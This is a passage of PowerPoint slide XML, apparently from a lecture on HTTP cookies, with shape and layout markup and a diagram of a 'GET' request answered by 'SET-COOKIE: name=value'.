              <a:rPr spc="-619" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-2700" baseline="-30303" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="144" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-1182" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-1124" baseline="-30303" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-762" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-1723" baseline="-30303" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-265" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-2335" baseline="-30303" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="442" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-895" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-1540" baseline="-30303" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-387" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-2136" baseline="-30303" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-276" dirty="0">
                <a:latin typeface="Eras Bold ITC"/>
                <a:cs typeface="Eras Bold ITC"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-2534" baseline="-30303" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-11" dirty="0">
                <a:latin typeface="Eras Bold ITC"/>
                <a:cs typeface="Eras Bold ITC"/>
              </a:rPr>
              <a:t>..</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Eras Bold ITC"/>
              <a:cs typeface="Eras Bold ITC"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47110" name="object 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4BD4BC7-E263-0644-8F80-D831F081F5C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7823200" y="2760663"/>
            <a:ext cx="1101725" cy="158273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47111" name="object 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C95BAD3D-3D67-FD4C-9E8C-892E40CA77FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7681913" y="4460875"/>
            <a:ext cx="1385887" cy="4921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80205F2F-E8E2-C949-9A75-8A656B4F51C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="812800"/>
            <a:ext cx="8515350" cy="784225"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49155" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D173454-53F3-C842-94A4-4048B9B0E384}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1069975" y="2597150"/>
            <a:ext cx="7918450" cy="428625"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz"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pic>
        <p:nvPicPr>
          <p:cNvPr id="49156" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{326ED267-01B4-E848-897C-93BAB91AAC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685800"/>
            <a:ext cx="1004887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object 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44821284-3F85-2042-AD1C-5E1640CD24CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7823200" y="2760663"/>
            <a:ext cx="1101725" cy="15827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object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8A6508B-6809-FE4A-A843-5DD4A63FCA79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9217025" y="2954338"/>
            <a:ext cx="144463" cy="144462"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 289559"/>
              <a:gd name="T1" fmla="*/ 0 h 289560"/>
              <a:gd name="T2" fmla="*/ 0 w 289559"/>
              <a:gd name="T3" fmla="*/ 276 h 289560"/>
              <a:gd name="T4" fmla="*/ 276 w 289559"/>
              <a:gd name="T5" fmla="*/ 138 h 289560"/>
              <a:gd name="T6" fmla="*/ 0 w 289559"/>
              <a:gd name="T7" fmla="*/ 0 h 289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559" h="289560">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="288996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="288996" y="14449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0179" name="object 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24B1B4BE-7DDA-6F4F-951E-37FF9C9CA4BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="5942013"/>
            <a:ext cx="2371725" cy="14874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0180" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AFA161B-F66B-704C-B964-D7D8B8FE7928}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="812800"/>
            <a:ext cx="8515350" cy="784225"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50181" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE3702B9-65AC-7A4B-B9E9-98FC9462EF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196850"/>
            <a:ext cx="10048875" cy="565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5257F7A4-EA3A-AB40-AB1A-B1406BDF28EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="234950" y="203200"/>
            <a:ext cx="22828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4" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="99" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="66" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="44" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>e</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2)</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52227" name="object 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FD1A629-2E57-8349-87A1-4425E7BDACCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1116013" y="1304925"/>
            <a:ext cx="2371725" cy="14874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2228" name="object 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4ECC91C8-B651-8643-AE0F-4319ABA0E4B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4821238" y="2360613"/>
            <a:ext cx="69850" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 32385"/>
              <a:gd name="T1" fmla="*/ 2147483646 w 32385"/>
              <a:gd name="T2" fmla="*/ 0 60000 65536"/>
              <a:gd name="T3" fmla="*/ 0 60000 65536"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T2">
                <a:pos x="T0" y="0"/>
              </a:cxn>
              <a:cxn ang="T3">
                <a:pos x="T1" y="0"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="32385">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="32278" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="505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object 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{145835C5-0C9C-4D4B-A3AA-70E53EA71AA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4121150" y="1547813"/>
            <a:ext cx="3000375" cy="750887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="71543" algn="ctr" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-77" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-287" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-77" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="33" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-77" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="33" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-1083" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-1242" baseline="41666" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-1480" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-347" baseline="41666" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-1889" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-230" baseline="41666" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-298" baseline="41666" dirty="0">
                <a:latin typeface="Eras Bold ITC"/>
                <a:cs typeface="Eras Bold ITC"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-1767" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-15" baseline="41666" dirty="0">
                <a:latin typeface="Eras Bold ITC"/>
                <a:cs typeface="Eras Bold ITC"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="148" baseline="41666" dirty="0">
                <a:latin typeface="Eras Bold ITC"/>
                <a:cs typeface="Eras Bold ITC"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-77" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="33" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-77" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="33" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-939" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="110" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>→</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="88"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600" spc="-2136" baseline="-30303" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>←</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-99" dirty="0">
                <a:latin typeface="Eras Bold ITC"/>
                <a:cs typeface="Eras Bold ITC"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-2799" baseline="-30303" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-11" dirty="0">
                <a:latin typeface="Eras Bold ITC"/>
                <a:cs typeface="Eras Bold ITC"/>
              </a:rPr>
              <a:t>..</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-784" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-1854" baseline="-30303" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-475" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-2452" baseline="-30303" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-77" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-2055" baseline="-30303" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-442" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-2651" baseline="-30303" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-353" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-1069" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-1854" baseline="-30303" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-674" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-2468" baseline="-30303" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="331" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-1005" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-1657" baseline="-30303" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-77" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-2898" baseline="-30303" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="44" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-420" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-2103" baseline="-30303" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-619" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-2700" baseline="-30303" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="144" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-1182" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-1124" baseline="-30303" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-762" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-1723" baseline="-30303" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-265" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-2335" baseline="-30303" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="442" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-895" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-1540" baseline="-30303" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>−</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-387" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-2136" baseline="-30303" dirty="0">
                <a:latin typeface="Lucida Sans Unicode"/>
